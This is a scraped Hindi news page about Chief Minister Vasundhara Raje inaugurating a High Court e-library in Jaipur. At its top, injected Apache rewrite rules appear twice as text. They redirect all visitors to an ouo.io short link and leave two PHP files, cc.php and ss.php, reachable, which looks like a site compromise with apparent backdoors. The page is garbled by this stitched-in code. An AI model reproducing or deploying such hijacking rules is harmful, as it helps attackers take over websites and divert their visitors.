
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 387
Previousजयपुर। मुख्यमंत्री वसुन्धरा राजे ने कल हाईकोर्ट परिसर स्थित ई-लाइब्रेरी का उद्घाटन किया। यह लाइब्रेरी राजस्थान की पहली ई-लाइब्रेरी है, जहां पर हाईकोर्ट के वकील कानून सम्मत पुस्तकों का निःशुल्क अध्ययन कर सकेंगे। सीएम राजे ने कम्प्यूटर के माध्यम से ई-लाइब्रेरी की कार्यप्रणाली के बारे में जानकारी ली। मुख्यमंत्री ने हाईकोर्ट बार एसोसिएशन, जयपुर के सदस्यों की जानकारी से संबंधित डायरेक्ट्री का विमोचन भी किया।
इस अवसर पर राजस्थान हाईकोर्ट के मुख्य न्यायाधीश प्रदीप नन्द्राजोग, न्यायाधीश कल्पेश एस. झावेरी एवं हाईकोर्ट के अन्य गणमान्य न्यायाधीश, सांसद रामचरण बोहरा और बार एसोसिएशन जयपुर के अध्यक्ष राजेन्द्र कुमार शर्मा, सचिव सतीश कुमार खांडल सहित हाईकोर्ट के अधिवक्ता मौजूद थे।